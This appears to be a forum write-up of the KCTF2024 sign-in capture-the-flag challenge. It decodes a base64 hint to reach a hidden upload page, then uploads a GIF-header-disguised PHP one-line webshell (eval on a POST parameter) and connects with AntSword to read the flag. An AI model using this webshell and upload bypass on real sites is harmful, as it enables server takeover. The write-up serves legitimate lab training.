-
-
[原创]KCTF2024_签到题 逐光启航
-
发表于: 2024-8-16 14:41
-
00x00 审查题目
打开靶机,观察到导航栏存在 hint 标签,点击可进入 flag.php 页面。
index.php 页面无其他信息。
00x01 flag.php页面分析
审查网页源代码,存在一行注释
1 | <!-- aGlkZGVuX3BhZ2UucGhw--> |
推测为 base 家族编码,使用 basecrack 一键解码得 hidden_page.php。
00x02 上传图片马
进入 hidden_page.php 页面,要求上传图片。使用经典图片文件头绕过一句话木马,测试上传没有明显报错。
1 2 | GIF89A<script language="php">eval($_POST['ant']);</script> |
00x03 获取flag
上传正常图片尝试访问 upload 路径发现可以访问到上传图片。
使用中国蚁剑连接服务,在根目录获得 flag 文件。
1 | flag{a20c926f-d153-4884-b032-3da72c994625} |
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课
|
|
|---|---|
